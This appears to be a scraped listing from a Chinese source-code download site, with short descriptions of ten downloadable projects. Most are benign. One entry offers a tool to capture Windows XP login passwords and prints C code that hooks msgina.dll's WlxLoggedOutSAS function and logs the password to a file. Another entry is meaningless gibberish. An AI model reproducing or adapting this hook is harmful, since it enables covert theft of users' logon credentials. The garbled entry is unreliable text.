-
win32程序员手册1 程序员必备
win32程序员手册1 程序员必备-win32 programmer manual
- 2023-02-17 20:20:04下载
- 积分:1
-
2443系统的BSP,源代码
2443 wince5.0 bsp, source code-2443 wince5.0 bsp,source code
- 2022-02-05 06:17:51下载
- 积分:1
-
Image to Text Converter !
Image to Text Converter !
- 2022-02-01 06:52:13下载
- 积分:1
-
使用方便小巧的通讯录
使用方便小巧的通讯录-compact easy-to-use directory
- 2022-01-26 04:05:44下载
- 积分:1
-
this compressed file is on the realization of automobile sales management system...
此压缩文件是关于实现汽车销售管理系统的数据库设计。包括代码 可执行文件 和说明-this compressed file is on the realization of automobile sales management system database design. Including executable code and annotations, etc.
- 2023-01-21 04:40:03下载
- 积分:1
-
泰瑟做 Merceruis De Lado
Nnayae diymes motne te 巷 pasione ge 幔啦 varisame lopiae tasiemsf fhjgsnm eadadae jadane jdhsnmrse fkjekmcee ejhcjehke ejkejn ekeke ekejkeee jikkee hbfhgse nbdfdhe uioiiode abdbnede jehxne ejhegheje jhehmsnne ebgene enebnne ennebnbe ebenbed f r gfnbne mnbenfene mnbenbcmem eeeebnbebmcnefbnenfmenfnebbvf ebebfnen e
- 2023-07-24 10:10:03下载
- 积分:1
-
硬币的识别
这个项目是由尼山纳瓦达纳承认斯里兰卡硬币使用 OpenCV 开发
- 2022-01-26 06:21:03下载
- 积分:1
-
金山词霸组件屏幕取词源码
资源描述金山词霸组件屏幕取词源码。C#源码,可用,XP,win7都能运行。
- 2023-01-08 08:55:03下载
- 积分:1
-
by calling Windows API Simulation System mouse and keyboard, a typical example.
Windows下通过调用API模拟系统鼠标,按键的典型例子.-by calling Windows API Simulation System mouse and keyboard, a typical example.
- 2023-05-10 22:00:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1